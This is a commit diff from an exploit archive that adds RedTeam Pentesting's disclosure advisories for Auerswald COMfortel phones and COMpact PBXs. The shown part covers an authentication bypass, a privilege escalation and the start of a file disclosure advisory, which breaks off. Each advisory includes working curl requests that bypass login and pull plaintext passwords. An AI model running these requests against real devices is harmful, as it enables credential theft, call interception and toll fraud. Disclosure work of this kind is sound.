DB: 2021-12-07
8 changes to exploits/shellcodes HCL Lotus Notes V12 - Unquoted Service Path Auerswald COMfortel 2.8F - Authentication Bypass Auerswald COMpact 8.0B - Privilege Escalation Auerswald COMpact 8.0B - Arbitrary File Disclosure Auerswald COMpact 8.0B - Multiple Backdoors Advanced Comment System 1.0 - Remote Command Execution (RCE) Croogo 3.0.2 - Remote Code Execution (Authenticated)
This commit is contained in:
parent
34c9d56d78
commit
0990eb4d38
8 changed files with 1376 additions and 66 deletions
317
exploits/hardware/remote/50565.txt
Normal file
317
exploits/hardware/remote/50565.txt
Normal file
|
@ -0,0 +1,317 @@
|
||||||
|
# Exploit Title: Auerswald COMfortel 2.8F - Authentication Bypass
|
||||||
|
# Date: 06/12/2021
|
||||||
|
# Exploit Author: RedTeam Pentesting GmbH
|
||||||
|
# Version: 1400/2600/3600
|
||||||
|
|
||||||
|
Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting discovered a vulnerability in the web-based
|
||||||
|
configuration management interface of the Auerswald COMfortel 1400 and
|
||||||
|
2600 IP desktop phones. The vulnerability allows accessing configuration
|
||||||
|
data and settings in the web-based management interface without
|
||||||
|
authentication.
|
||||||
|
|
||||||
|
|
||||||
|
Details
|
||||||
|
=======
|
||||||
|
|
||||||
|
Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
|
||||||
|
Affected Versions: <= 2.8F
|
||||||
|
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
|
||||||
|
Vulnerability Type: Authentication Bypass
|
||||||
|
Security Risk: high
|
||||||
|
Vendor URL: https://www.auerswald.de
|
||||||
|
Vendor Status: fixed version released
|
||||||
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
|
||||||
|
Advisory Status: published
|
||||||
|
CVE: CVE-2021-40856
|
||||||
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
|
||||||
|
|
||||||
|
|
||||||
|
Introduction
|
||||||
|
============
|
||||||
|
|
||||||
|
"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and
|
||||||
|
IP system phone), with 4.3" colour touch display and preconfigured
|
||||||
|
answering machine"
|
||||||
|
|
||||||
|
(from the vendor's homepage)
|
||||||
|
|
||||||
|
|
||||||
|
More Details
|
||||||
|
============
|
||||||
|
|
||||||
|
During a penetration test it was discovened that several VoIP phones
|
||||||
|
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow
|
||||||
|
accessing administrative functions without login credentials, bypassing
|
||||||
|
the authentication. This can be achieved by simply prefixing API
|
||||||
|
endpoints that require authentication with "/about/../", since the
|
||||||
|
"/about" endpoint does not require any authentication.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================
|
||||||
|
|
||||||
|
The phones run a web-based management interface on Port 80. If accessed,
|
||||||
|
the HTTP response code 401 together with a website redirecting to the
|
||||||
|
path "/statics/pageChallenge.html" is returned. This can for example be
|
||||||
|
seen using the command-line HTTP client curl[1] as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include 'http://192.168.1.190/'
|
||||||
|
HTTP/1.1 401 Unauthorized
|
||||||
|
[...]
|
||||||
|
|
||||||
|
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
|
||||||
|
URL=/statics/pageChallenge.html'></head><body></body></html>
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The website contains JavaScript code that requests the path
|
||||||
|
"/about?action=get" and loads a JSON document (formatted and shortened
|
||||||
|
to increase readability):
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include 'http://192.168.1.190/about?action=get'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 3673
|
||||||
|
Date: Mon, 30 Aug 2021 08:39:24 GMT
|
||||||
|
Server: lighttpd
|
||||||
|
|
||||||
|
{
|
||||||
|
"DATA": {
|
||||||
|
"firmware": {
|
||||||
|
"TYPE": "DATAITEM",
|
||||||
|
"VALUE": "2.8E",
|
||||||
|
"KEY": "firmware"
|
||||||
|
},
|
||||||
|
"serial": {
|
||||||
|
"TYPE": "DATAITEM",
|
||||||
|
"VALUE": "1234567890",
|
||||||
|
"KEY": "serial"
|
||||||
|
},
|
||||||
|
[...]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Among other information, this JSON document contains the serial number
|
||||||
|
and firmware version displayed on the website. This action can be
|
||||||
|
accessed without authentication. Other endpoints require authentication,
|
||||||
|
for example the path "/tree?action=get", from which the menu structure
|
||||||
|
is loaded after successful authentication:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include 'http://192.168.1.190/tree?action=get'
|
||||||
|
HTTP/1.1 401 Unauthorized
|
||||||
|
[...]
|
||||||
|
|
||||||
|
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
|
||||||
|
URL=/statics/pageChallenge.html'></head><body></body></html>
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
During the penetration test, it was discovered that this action can
|
||||||
|
successfully be requested by inserting the prefix "/about/../". In order
|
||||||
|
to prevent curl from normalizing the URL path, the option "--path-as-is"
|
||||||
|
must be supplied:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include --path-as-is \
|
||||||
|
'http://192.168.1.190/about/../tree?action=get'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 3808
|
||||||
|
Date: Mon, 30 Aug 2021 08:42:11 GMT
|
||||||
|
Server: lighttpd
|
||||||
|
|
||||||
|
{
|
||||||
|
"TYPE": "TREENODEPAGE",
|
||||||
|
"ITEMS": {
|
||||||
|
"COUNT": 2,
|
||||||
|
"TYPE": "ITEMLIST",
|
||||||
|
"1": {
|
||||||
|
"id": 31,
|
||||||
|
"text": "applications_settings",
|
||||||
|
"TYPE": "TREENODEPAGE",
|
||||||
|
"ITEMS": {
|
||||||
|
"COUNT": 1,
|
||||||
|
"TYPE": "ITEMLIST",
|
||||||
|
"0": {
|
||||||
|
"target": "pageFunctionkeys.html",
|
||||||
|
"id": 32,
|
||||||
|
"action": "/functionkeys",
|
||||||
|
"text": "key_app",
|
||||||
|
"pagename": "Functionkeys",
|
||||||
|
"TYPE": "TREENODEPAGE"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
[...]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The endpoint "/account" allows listing account data:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include --path-as-is \
|
||||||
|
'http://192.168.1.190/about/../account?action=list'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 793
|
||||||
|
Date: Mon, 30 Aug 2021 08:43:33 GMT
|
||||||
|
Server: lighttpd
|
||||||
|
|
||||||
|
{
|
||||||
|
"DATA": {
|
||||||
|
[...]
|
||||||
|
"accountList0": {
|
||||||
|
"KEY": "accountList0",
|
||||||
|
"COUNT": 1,
|
||||||
|
"TYPE": "DATAMODEL",
|
||||||
|
"VALUE": {
|
||||||
|
"0": {
|
||||||
|
"ID": 32327,
|
||||||
|
"PARENTID": 0,
|
||||||
|
"PROVIDER": "ProviderName",
|
||||||
|
"NAME": "123 Example User",
|
||||||
|
"STATUS": 4,
|
||||||
|
"DEFAULT": 1
|
||||||
|
}
|
||||||
|
},
|
||||||
|
[...]
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The ID 32327 can then be used to get details about that particular
|
||||||
|
account, including the username and password:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --include --path-as-is \
|
||||||
|
'http://192.168.1.190/about/../account?action=get&itemID=32327'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 2026
|
||||||
|
Date: Mon, 30 Aug 2021 08:44:13 GMT
|
||||||
|
Server: lighttpd
|
||||||
|
|
||||||
|
{
|
||||||
|
"DATA": {
|
||||||
|
[...]
|
||||||
|
"Benutzer": {
|
||||||
|
"TYPE": "DATAITEM",
|
||||||
|
"VALUE": "123",
|
||||||
|
"KEY": "Benutzer"
|
||||||
|
},
|
||||||
|
"Passwort": {
|
||||||
|
"TYPE": "DATAITEM",
|
||||||
|
"VALUE": "secret",
|
||||||
|
"KEY": "Passwort"
|
||||||
|
},
|
||||||
|
[...]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
|
||||||
|
access and use the web-based management interface as if regular login
|
||||||
|
credentials were presented.
|
||||||
|
|
||||||
|
It is likely that other functionality can be accessed in the same way,
|
||||||
|
to for example change settings or activate the integrated option for
|
||||||
|
recording the Ethernet traffic.
|
||||||
|
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Disable the web-based management interface if possible.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade to a firmware version which corrects this vulnerability.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
Inserting the prefix "/about/../" allows bypassing the authentication
|
||||||
|
check for the web-based configuration management interface. This enables
|
||||||
|
attackers to gain access to the login credentials used for
|
||||||
|
authentication at the PBX, among other data.
|
||||||
|
|
||||||
|
Attackers can then authenticate at the PBX as the respective phone and
|
||||||
|
for example call premium rate phone lines they operate to generate
|
||||||
|
revenue. They can also configure a device they control as the PBX in the
|
||||||
|
phone, so all incoming and outgoing phone calls are intercepted and can
|
||||||
|
be recorded. The device also contains a function to record all Ethernet
|
||||||
|
data traffic, which is likely affected as well.
|
||||||
|
|
||||||
|
Overall, the vulnerability completely bypasses the authentication for
|
||||||
|
the web-based management interface and therefore poses a high risk.
|
||||||
|
|
||||||
|
|
||||||
|
References
|
||||||
|
==========
|
||||||
|
|
||||||
|
[1] https://curl.se
|
||||||
|
[2] https://github.com/zaproxy/zaproxy/
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2021-08-26 Vulnerability identified
|
||||||
|
2021-09-01 Customer approved disclosure to vendor
|
||||||
|
2021-09-10 Vendor notified
|
||||||
|
2021-09-10 CVE ID requested
|
||||||
|
2021-09-10 CVE ID assigned
|
||||||
|
2021-10-04 Vendor provides access to device with fixed firmware
|
||||||
|
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
|
||||||
|
2021-10-14 Vendor releases corrected firmware version 2.8G
|
||||||
|
2021-12-06 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at:
|
||||||
|
https://www.redteam-pentesting.de/
|
||||||
|
|
||||||
|
|
||||||
|
Working at RedTeam Pentesting
|
||||||
|
=============================
|
||||||
|
|
||||||
|
RedTeam Pentesting is looking for penetration testers to join our team
|
||||||
|
in Aachen, Germany. If you are interested please visit:
|
||||||
|
https://www.redteam-pentesting.de/jobs/
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
|
301
exploits/hardware/remote/50567.txt
Normal file
301
exploits/hardware/remote/50567.txt
Normal file
|
@ -0,0 +1,301 @@
|
||||||
|
# Exploit Title: Auerswald COMpact 8.0B - Privilege Escalation
|
||||||
|
# Date: 06/12/2021
|
||||||
|
# Exploit Author: RedTeam Pentesting GmbH
|
||||||
|
|
||||||
|
Advisory: Auerswald COMpact Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting discovered a vulnerability in the web-based
|
||||||
|
management interface of the Auerswald COMpact 5500R PBX which allows
|
||||||
|
low-privileged users to access passwords of administrative user accounts.
|
||||||
|
|
||||||
|
|
||||||
|
Details
|
||||||
|
=======
|
||||||
|
|
||||||
|
Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
|
||||||
|
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
|
||||||
|
Fixed Versions: 8.2B
|
||||||
|
Vulnerability Type: Privilege Escalation
|
||||||
|
Security Risk: high
|
||||||
|
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
|
||||||
|
Vendor Status: fixed version released
|
||||||
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
|
||||||
|
Advisory Status: published
|
||||||
|
CVE: CVE-2021-40857
|
||||||
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857
|
||||||
|
|
||||||
|
|
||||||
|
Introduction
|
||||||
|
============
|
||||||
|
|
||||||
|
"Fully modular VoIP appliance for more efficient communication processes
|
||||||
|
With the COMpact 5500R, you are originally equipped for everyday
|
||||||
|
business - now and in the future.
|
||||||
|
|
||||||
|
The fully modular architecture with 80 IP channels and all the functions
|
||||||
|
of a large ITC server allows up to 112 subscribers and thus scales with
|
||||||
|
your company.
|
||||||
|
|
||||||
|
Continuous maintanance and expansion of the system software makes this
|
||||||
|
versatile IP server a future-proof investment in any business
|
||||||
|
communication."
|
||||||
|
|
||||||
|
(from the vendor's homepage)
|
||||||
|
|
||||||
|
|
||||||
|
More Details
|
||||||
|
============
|
||||||
|
|
||||||
|
Attackers with low-privileged user accounts, for example those that are
|
||||||
|
used by VoIP phones, can log into the web-based management interface of
|
||||||
|
the COMpact 5500R PBX. Afterwards, the list of user accounts can be
|
||||||
|
listed and details shown for each user account. Adding the URL parameter
|
||||||
|
"passwd=1" then also includes the clear text password for each user
|
||||||
|
account, including administrative ones, which can then be used to
|
||||||
|
authenticate against the management interface.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================
|
||||||
|
|
||||||
|
The command-line HTTP client curl[1] can be used as follows to log in
|
||||||
|
with the username "123" and the password "secret" (shortened and
|
||||||
|
formatted to increase readability):
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[
|
||||||
|
{
|
||||||
|
"login": 1,
|
||||||
|
"userId": 1234,
|
||||||
|
"userRufNr": "123",
|
||||||
|
"userName": "123",
|
||||||
|
"pbxType": 35,
|
||||||
|
"pbxId": 0,
|
||||||
|
"pbx": "COMpact 5500R",
|
||||||
|
"pbxEdit": "Comp.5500R",
|
||||||
|
"isActivated": 1,
|
||||||
|
"dongleTnCount": 112,
|
||||||
|
"currentConfig": 34,
|
||||||
|
"cur": "EUR",
|
||||||
|
"language": 0,
|
||||||
|
"hidePrivat": 1,
|
||||||
|
"offlineConfig": false
|
||||||
|
},
|
||||||
|
[...]
|
||||||
|
]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The server returns a JSON document describing the user account as well
|
||||||
|
as a session ID in a cookie. This session ID can then be used to access
|
||||||
|
other API endpoints on the PBX. The following listing shows the request to
|
||||||
|
the path "/logstatus_state", which returns the current access level:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Teilnehmer"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The access level in this case is "Teilnehmer" (member).
|
||||||
|
|
||||||
|
The list of all other users can be requested as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
|
||||||
|
https://192.168.1.2/cfg_data_teilnehmer
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[
|
||||||
|
[...]
|
||||||
|
{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
|
||||||
|
[...]
|
||||||
|
{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
|
||||||
|
[...]
|
||||||
|
]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Two user accounts are shown in the listing above: the current user's
|
||||||
|
account with the ID 1234 and a different user account with so-called
|
||||||
|
"sub-admin" privileges with the ID 2222.
|
||||||
|
|
||||||
|
Details about a particular user account with a given ID can be requested
|
||||||
|
like this:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
|
||||||
|
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"rufnr":"123","name":"Example User",[...],
|
||||||
|
"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",
|
||||||
|
[...], "isSubadmin":0,[...]}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
In the returned JSON document, the values of the fields for the PIN,
|
||||||
|
token and password are replaced by "XXX". But if the URL parameter
|
||||||
|
"passwd" is set to the value 1, the values are returned in plain text:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
|
||||||
|
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"rufnr":"123","name":"Example User",[...],
|
||||||
|
"privatPin":"12345678","privatPass":"secretpassword",
|
||||||
|
"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
This can be repeated for other user accounts, for example for the
|
||||||
|
user account with the ID 2222 shown it the listing earlier. The server
|
||||||
|
returns the plain text password for the other user account:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
|
||||||
|
'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
|
||||||
|
"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",
|
||||||
|
[...],"isSubadmin":1,[...]}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The password can then be used to log into the PBX with the other user
|
||||||
|
account:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --anyauth --user sub-admin:verysecretpassword --include \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
[...]
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[{"login":2,"userId":2222,[...]}]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Checking the access level with the new session ID shows that the user is
|
||||||
|
now logged in with an administrative account:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Sub-Administrator"}%
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Workaround
|
||||||
|
==========
|
||||||
|
|
||||||
|
Disable or restrict access to the web-based management interface if
|
||||||
|
possible.
|
||||||
|
|
||||||
|
|
||||||
|
Fix
|
||||||
|
===
|
||||||
|
|
||||||
|
Upgrade to a firmware version which corrects this vulnerability.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk
|
||||||
|
=============
|
||||||
|
|
||||||
|
Attackers who have acquired access to a low-privileged user account, for
|
||||||
|
example by extracting such an account from a VoIP phone, can log into
|
||||||
|
the web-based management interface of the COMpact 5500R PBX and access
|
||||||
|
clear text passwords for other user accounts, including those with the
|
||||||
|
"sub-admin" privilege. After logging in with these newly acquired
|
||||||
|
credentials, attackers can access configuration settings and most other
|
||||||
|
functions.
|
||||||
|
|
||||||
|
They can then for example create new SIP credentials and use them to
|
||||||
|
call premium rate phone lines they operate to generate revenue. They can
|
||||||
|
monitor and even redirect all incoming and outgoing phone calls and
|
||||||
|
record all Ethernet data traffic.
|
||||||
|
|
||||||
|
Due to the severe and far-reaching consequences and despite the
|
||||||
|
prerequisite of having to know an existing low-privilege user account,
|
||||||
|
this vulnerability rated as a high risk.
|
||||||
|
|
||||||
|
|
||||||
|
Timeline
|
||||||
|
========
|
||||||
|
|
||||||
|
2021-08-26 Vulnerability identified
|
||||||
|
2021-09-01 Customer approved disclosure to vendor
|
||||||
|
2021-09-10 Vendor notified
|
||||||
|
2021-09-10 CVE ID requested
|
||||||
|
2021-09-10 CVE ID assigned
|
||||||
|
2021-10-05 Vendor provides access to device with fixed firmware
|
||||||
|
2021-10-11 Vendor provides fixed firmware
|
||||||
|
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
|
||||||
|
2021-12-06 Advisory published
|
||||||
|
|
||||||
|
|
||||||
|
References
|
||||||
|
==========
|
||||||
|
|
||||||
|
[1] https://curl.se/
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting GmbH
|
||||||
|
=======================
|
||||||
|
|
||||||
|
RedTeam Pentesting offers individual penetration tests performed by a
|
||||||
|
team of specialised IT-security experts. Hereby, security weaknesses in
|
||||||
|
company networks or products are uncovered and can be fixed immediately.
|
||||||
|
|
||||||
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
||||||
|
share its knowledge and enhance the public knowledge with research in
|
||||||
|
security-related areas. The results are made available as public
|
||||||
|
security advisories.
|
||||||
|
|
||||||
|
More information about RedTeam Pentesting can be found at:
|
||||||
|
https://www.redteam-pentesting.de/
|
||||||
|
|
||||||
|
|
||||||
|
Working at RedTeam Pentesting
|
||||||
|
=============================
|
||||||
|
|
||||||
|
RedTeam Pentesting is looking for penetration testers to join our team
|
||||||
|
in Aachen, Germany. If you are interested please visit:
|
||||||
|
https://www.redteam-pentesting.de/jobs/
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
||||||
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
||||||
|
52068 Aachen https://www.redteam-pentesting.de
|
||||||
|
Germany Registergericht: Aachen HRB 14004
|
||||||
|
Geschäftsführer: Patrick Hof, Jens Liebchen
|
302
exploits/hardware/remote/50568.txt
Normal file
302
exploits/hardware/remote/50568.txt
Normal file
|
@ -0,0 +1,302 @@
|
||||||
|
# Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure
|
||||||
|
# Date: 06/12/2021
|
||||||
|
# Exploit Author: RedTeam Pentesting GmbH
|
||||||
|
|
||||||
|
Advisory: Auerswald COMpact Arbitrary File Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
RedTeam Pentesting discovered a vulnerability in the web-based
|
||||||
|
management interface of the Auerswald COMpact 5500R PBX which allows
|
||||||
|
users with the "sub-admin" privilege to access any files on the PBX's
|
||||||
|
file system.
|
||||||
|
|
||||||
|
|
||||||
|
Details
|
||||||
|
=======
|
||||||
|
|
||||||
|
Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
|
||||||
|
Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
|
||||||
|
Fixed Versions: 8.2B
|
||||||
|
Vulnerability Type: Arbitrary File Disclosure
|
||||||
|
Security Risk: medium
|
||||||
|
Vendor URL: https://www.auerswald.de/en/product/compact-5500r
|
||||||
|
Vendor Status: fixed version released
|
||||||
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
|
||||||
|
Advisory Status: published
|
||||||
|
CVE: CVE-2021-40858
|
||||||
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858
|
||||||
|
|
||||||
|
|
||||||
|
Introduction
|
||||||
|
============
|
||||||
|
|
||||||
|
"Fully modular VoIP appliance for more efficient communication processes
|
||||||
|
With the COMpact 5500R, you are originally equipped for everyday
|
||||||
|
business - now and in the future.
|
||||||
|
|
||||||
|
The fully modular architecture with 80 IP channels and all the functions
|
||||||
|
of a large ITC server allows up to 112 subscribers and thus scales with
|
||||||
|
your company.
|
||||||
|
|
||||||
|
Continuous maintanance and expansion of the system software makes this
|
||||||
|
versatile IP server a future-proof investment in any business
|
||||||
|
communication."
|
||||||
|
|
||||||
|
(from the vendor's homepage)
|
||||||
|
|
||||||
|
|
||||||
|
More Details
|
||||||
|
============
|
||||||
|
|
||||||
|
RedTeam Pentesting discovered that attackers with administrative access
|
||||||
|
to the PBX's web-based management interface (as a so-called "sub-admin")
|
||||||
|
can download arbitrary files from the PBX's file system. This includes
|
||||||
|
the usually not accessible configuration database which contains the
|
||||||
|
password for the highly privileged "Admin" user in clear text.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept
|
||||||
|
================
|
||||||
|
|
||||||
|
The command-line HTTP client curl[1] can be used to log into the
|
||||||
|
management interface of the PBX with the username "sub-admin" and the
|
||||||
|
password "verysecretpassword" as follows:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --anyauth --user sub-admin:verysecretpassword --include \
|
||||||
|
https://192.168.1.2/tree
|
||||||
|
|
||||||
|
[...]
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
|
||||||
|
[...]
|
||||||
|
|
||||||
|
[{"login":2,"userId":2222,[...]}]
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The server returns a session ID in a cookie which is then used to check
|
||||||
|
the access level:
|
||||||
|
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
|
||||||
|
https://192.168.1.2/logstatus_state
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Content-Type: application/json; charset=utf-8;
|
||||||
|
[...]
|
||||||
|
|
||||||
|
{"logstatus":"Sub-Administrator"}
|
||||||
|
------------------------------------------------------------------------
|
||||||
|
|
||||||
|
In the PBX's user management, the access level "Sub-Administrator" is
|
||||||
|
used for user accounts who should be able to configure the PBX. There
|
||||||
|
are also other, higher-level access privileges.
|
||||||
|
|
||||||
|
Users with the "sub-admin" privilege can configure music on hold (MOH,
|
||||||
|
"Wartemusik"), and for example listen to the currently configured music.
|
||||||
|
In order to do this, the browser requests the music files from the PBX.
|
||||||
|
|
||||||
|
The file "alarm1.wav" can be accessed with curl as follows:
|
||||||
